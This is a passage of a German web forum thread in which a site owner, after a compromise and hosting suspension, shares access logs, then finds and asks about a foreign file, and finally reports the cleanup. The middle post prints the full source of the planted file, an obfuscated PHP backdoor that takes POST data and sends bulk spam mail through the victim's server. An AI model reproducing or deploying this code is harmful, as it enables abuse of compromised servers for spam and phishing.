91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/bg_footer2.png HTTP/1.1" 200 22043 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/bannerrotator/img/transBlack75.png HTTP/1.1" 200 207 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/bannerrotator/img/dotLight.png HTTP/1.1" 200 288 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /up.png HTTP/1.1" 200 1639 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/bannerrotator/img/dotDark.png HTTP/1.1" 200 282 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:22 +0200] "GET /include/designs/mar_CyNect/bannerrotator/img/pause.png HTTP/1.1" 200 216 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/images/teams/boflogo.png HTTP/1.1" 200 172025 "http://bof-clan.eu/index.php?startseite" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/header.png HTTP/1.1" 200 332479 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:21 +0200] "GET /include/designs/mar_CyNect/images/background.jpg HTTP/1.1" 200 424636 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:23 +0200] "GET /include/designs/mar_CyNect/images/scroll_bg.jpg HTTP/1.1" 200 972 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:28 +0200] "GET /include/designs/mar_CyNect/images/but_boxnews_a.png HTTP/1.1" 200 6035 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:28 +0200] "GET /include/designs/mar_CyNect/images/menu_over.png HTTP/1.1" 200 1820 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:29 +0200] "GET /include/designs/mar_CyNect/images/navi_button.png HTTP/1.1" 200 2866 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
91.66.197.155 - - [01/Oct/2013:02:18:31 +0200] "GET /include/designs/mar_CyNect/images/but_boxforum_a.png HTTP/1.1" 200 8442 "http://bof-clan.eu/include/designs/mar_CyNect/style_cynect.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
5.10.83.42 - - [01/Oct/2013:02:19:21 +0200] "GET /index.php?kalender-v1-m12-y2012-d13 HTTP/1.1" 200 8977 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
66.249.78.16 - - [01/Oct/2013:02:20:11 +0200] "GET /index.php?kasse-m2-y2673 HTTP/1.1" 200 8780 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.10.83.30 - - [01/Oct/2013:02:22:25 +0200] "GET /index.php?user-details-2 HTTP/1.1" 200 10570 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
66.249.78.16 - - [01/Oct/2013:02:26:38 +0200] "GET /index.php?kasse-m3-y2673 HTTP/1.1" 200 8774 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.10.83.27 - - [01/Oct/2013:02:28:43 +0200] "GET /index.php?kalender-v1-m12-y2013-d19 HTTP/1.1" 200 8980 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
5.10.83.80 - - [01/Oct/2013:02:35:07 +0200] "GET /index.php?kalender-v1-m3-y2012-d1 HTTP/1.1" 200 8970 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)"
66.249.78.16 - - [01/Oct/2013:02:35:17 +0200] "GET /index.php?kasse-m4-y2673 HTTP/1.1" 200 8779 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)


    z.B in der ersten zeile von der log datei steht:

    121.205.90.93 - - [01/Oct/2013:02:08:17 +0200] "POST /index.php?gallery-show-1-p2 HTTP/1.0" 200 504362 "http://www.bof-clan.eu/index.php?gallery-show-1-p2" "Opera/9.80 (Windows NT 6.1; WOW64; Edition Yx) Presto/2.12.388 Version/12.10"


    muss ich jetzt die index.php gallery show löschen und erneuern?
    woher weiß ich welcher IP besuch normal ist und welcher mit böser absicht da war....


    Zuletzt modifiziert von Isalapisa am 07.10.2013 - 23:00:35
    0 Mitglieder finden den Beitrag gut.
  7. Di. 08.10.2013 00:30 Uhr #7
    User Pic
    Isalapisa Mitglied
    Registriert seit
    05.07.2012
    Beiträge
    135
    Beitragswertungen
    1 Beitragspunkte
    ok hab noch eine datei entdeckt die nicht zu mir gehört
    bannerlnyM.php Inhalt: 
    <?php
@error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) != false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 = count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; } for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 = $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_array('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } else { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { echo(chr(79).chr(75).md5(1234567890)."+1\n"); continue; } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417\n"; } } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>


    hab jetzt Filezilla gelöscht und WinSCP installiert, speicher das passwort auch nicht mehr ab.

    Hab das Passwort für den FTP Zugang nun geändert, Malewarebytes lass ich grad durchlaufen hat schon 12 treffer gefunden
    und alle dateien auf Änderungsdatum geschaut was aktuell war.
    Nix gefunden letzte aktion war 17-11-2012
    nur die Ordner waren alle aktuell, denke mal hier wurde einfach alle ordner untersucht vom virus. Hoffe nun das ich berfreit bin, was denkt ihr kann ich den Support anschreiben und sagen das ich mich drum gekümmert habe?
    Dann könnten die, die Homepage wieder freischalten


    Zuletzt modifiziert von Isalapisa am 08.10.2013 - 00:31:01
    0 Mitglieder finden den Beitrag gut.
  8. Mi. 16.10.2013 16:58 Uhr #8
    User Pic
    CeeJay Hall Of Fame
    Registriert seit
    23.03.2007
    Beiträge
    2.425
    Beitragswertungen
    18 Beitragspunkte
    wenn die Seite frei von Viren ist kannst du sie wieder freigeben lassen. Du hast doch sicherlich Backups von der Seite - mach jetzt erst mal ein Backup und speicher das gesondert ab (NICHT AUF DEM WEBSPACE)

    Falls was schief geht lächeln
    Nichts ist so sicher, wie die Änderung.
    0 Mitglieder finden den Beitrag gut.
  9. Mi. 16.10.2013 17:43 Uhr #9
    User Pic
    Isalapisa Mitglied
    Registriert seit
    05.07.2012
    Beiträge
    135
    Beitragswertungen
    1 Beitragspunkte
    hab die seite wieder frei bekommen,

    -system neu aufgesetzt
    -ftp daten gecheckt 2 trj. pferde gelöscht
    -pw geändert

    wie Revolution schon sagte,....
    das war die Lösung
    vielen dank allerseits zwinker
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu HTML, PHP, SQL,...

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten